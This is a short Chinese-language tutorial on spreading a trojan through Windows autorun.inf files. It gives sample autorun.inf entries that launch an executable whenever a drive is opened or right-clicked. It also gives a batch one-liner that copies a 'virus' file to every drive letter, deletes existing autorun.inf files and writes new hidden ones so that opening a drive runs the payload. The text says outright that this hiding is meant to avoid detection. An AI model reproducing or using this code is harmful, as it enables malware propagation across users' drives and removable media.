[AutoRun]
open=2007.exe
shellexecute=2007.exe
shell/Auto/command=2007.exe
[AutoRun]
open=2007.exe
shellexecute=2007.exe
shell/打开/command=2007.exe
shell=打开
蓝色是即使右击“打开” 也是运行木马(不管双击还是右击 ^-^)
open可以打开.exe .com .bat类文件
将以下代码用记事本写入,保存为1.bat,点击即可看到效果:
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z)do @copy /y cmd.bat %%i:/cmd.bat & @attrib +s +h %%i:/cmd.bat & (if exist %%i:/autorun.inf (attrib -r -a -s -h %%i:/autorun.inf & del %%i:/autorun.inf)) & echo [AutoRun]>%%i:/autorun.inf & echo shell/Open/command=cmd.vbs>>%%i:/autorun.inf & echo shell/Open=打开(^&O)>>%%i:/autorun.inf & echo shell/explore=资源管理器(^&O)>>%%i:/autorun.inf & echo shell/explorer/command=cmd.vbs>>%%i:/autorun.inf & attrib +s +h %%i:/autorun.inf
这段代码意思是遍历各盘,搜索autorun.inf文件,有就删掉,然后在每个盘下重建autorun.inf,并未它加上隐藏及系统属性,防止被发现,然后向autorun.inf中写入自动播放的代码,其中cmd.vbs和cmd.bat就是我假设的病毒,当双击盘符时就会自动打开cmd.vbs文件。